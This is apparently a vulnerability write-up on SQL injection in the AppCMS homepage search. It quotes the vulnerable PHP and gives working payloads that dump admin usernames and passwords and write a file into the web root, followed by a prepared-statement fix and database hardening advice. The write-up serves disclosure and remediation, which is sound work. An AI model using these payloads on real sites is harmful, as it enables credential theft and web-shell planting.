appcms homepage injection vulnerability


index.php

    if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
        $str = '';
        // $_GET['q'] is concatenated into the SQL string unescaped: this is the injection point
        $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15";
        $app_list = $dbm->query($sql);
        if (count($app_list['list']) > 0) {
            foreach ($app_list['list'] as $k => $v) {
                $app_list['list'][$k]['app_title'] = helper::utf8_substr($v['app_title'], 0, 20);
            }
            echo json_encode($app_list['list']);
            exit;
        } else {
            exit;
        }
    }

$_GET['q'] is passed straight into the query.
Payload:

q=1%'union select 1,uname,upass from appcms_admin_list %23

1%' closes the preceding '% so that the LIKE clause is complete; # comments out the rest of the statement; the UNION SELECT then returns the data.
The SQL statement becomes:

SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list

Writing a shell:

q=1%'union select 1,2,'aaa'  into outfile 'D://WWW//a.php' %23

The statement becomes:

SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php'
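The fix for both the data-extraction and the file-write variants is the same: stop building the LIKE pattern by string concatenation. Below is a hardened replacement for the search branch, added here as an example; it is not AppCMS code. It assumes an open mysqli connection in `$mysqli` and the same `TB_PREFIX` constant, and the function names `search_app_titles` and `escape_like` are invented for this example; AppCMS's own `$dbm` wrapper is not used.

```php
<?php
// Added example, not AppCMS code: a hardened replacement for the search branch
// in index.php. $mysqli (an open mysqli connection), search_app_titles and
// escape_like are assumptions; TB_PREFIX is the constant AppCMS already uses.

// Escape LIKE metacharacters so a user-supplied '%' or '_' matches literally.
// The backslash is MySQL's default LIKE escape character.
function escape_like(string $s): string
{
    return addcslashes($s, '\\%_');
}

// Run the title search with a bound parameter instead of string concatenation.
// The request text can never terminate the quoted pattern, so "1%' union ..."
// is searched for as literal title characters rather than executed as SQL.
function search_app_titles(mysqli $db, string $tablePrefix, string $q): array
{
    $q = trim($q);
    if ($q === '') {
        return [];
    }

    // The prefix comes from configuration, not from the request, but table
    // names cannot be bound, so whitelist it before interpolating it.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tablePrefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $table = $tablePrefix . 'app_list';

    $stmt = $db->prepare(
        "SELECT app_id, app_title, app_down FROM `{$table}` WHERE app_title LIKE ? LIMIT 15"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }

    $pattern = '%' . escape_like($q) . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $stmt->bind_result($appId, $appTitle, $appDown);

    $rows = [];
    while ($stmt->fetch()) {
        $rows[] = [
            'app_id'    => $appId,
            // Same 20-character truncation the original helper::utf8_substr applied.
            'app_title' => mb_substr($appTitle, 0, 20, 'UTF-8'),
            'app_down'  => $appDown,
        ];
    }
    $stmt->close();
    return $rows;
}

// Request handling that replaces the vulnerable branch in index.php.
if (trim($_GET['q'] ?? '') !== '' && !isset($_GET['tpl'])) {
    $list = search_app_titles($mysqli, TB_PREFIX, $_GET['q']);
    if (count($list) > 0) {
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode($list, JSON_UNESCAPED_UNICODE);
    }
    exit;
}
```

Binding the pattern as a parameter means the request text can no longer close the quoted LIKE pattern, so the UNION SELECT and INTO OUTFILE statements shown above are matched as literal title text instead of being executed. Escaping `%` and `_` is separate from the injection fix; it only stops a caller from turning the search into a wildcard scan. The INTO OUTFILE step additionally depends on the database account holding the FILE privilege and on `secure_file_priv` permitting the target path, so running the web application's account without FILE and with `secure_file_priv` set removes the file-write outcome even if another injection point is found.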

Author: p0
